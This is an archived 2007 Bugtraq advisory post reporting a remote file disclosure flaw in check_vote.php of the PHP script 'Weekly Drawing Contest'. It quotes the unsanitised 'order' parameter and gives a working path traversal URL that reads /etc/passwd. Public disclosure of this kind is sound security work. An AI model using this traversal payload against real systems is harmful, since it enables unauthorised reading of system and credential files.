Bugtraq: Weekly Drawing Contest <= (check_vote.php) Remote File Disclosure Vuln

Nmap Security Scanner

Intro

Ref Guide

Install Guide

Download

Changelog

Book

Docs
Security Lists

Bugtraq

Basics

More
Security Tools

More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:

Bugtraq mailing list archives

Weekly Drawing Contest <= (check_vote.php) Remote File Disclosure Vuln

From: "BorN To K!LL BorN To K!LL" <q.t.i () hotmail com>
Date: Tue, 13 Mar 2007 13:47:43 +0300

+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=

Weekly Drawing Contest <= (check_vote.php) Remote File Disclosure Vuln

Script: Weekly Drawing Contest

Version: 0.0.1

S!Te: http://www.hotscripts.com/jump.php?listing_id=52638&jump_type=1

Discover: BorN To K!LL

+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=

Bug in:
check_vote.php

Code:
$order = $_GET[ "order" ];

+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=

ExploiT:
~~~~~
wWw.SiTe.cOm/[path]/check_vote.php?order=../../../../etc/passwd

+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=

GreeTz 2:
Dr.2  -  str0ke  -  AsbMay  ....

KuW-SeC.cC  &  Asb-May.net

+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=

_________________________________________________________________

Express yourself instantly with MSN Messenger! Download today it's FREE!http://messenger.msn.click-url.com/go/onm00200471ave/direct/01/

By Date By Thread

Current thread:

Weekly Drawing Contest <= (check_vote.php) Remote File Disclosure Vuln BorN To K!LL BorN To K!LL (Mar 13)
- Re: Weekly Drawing Contest <= (check_vote.php) Remote File Disclosure Vuln Mailinglists Address (Mar 13)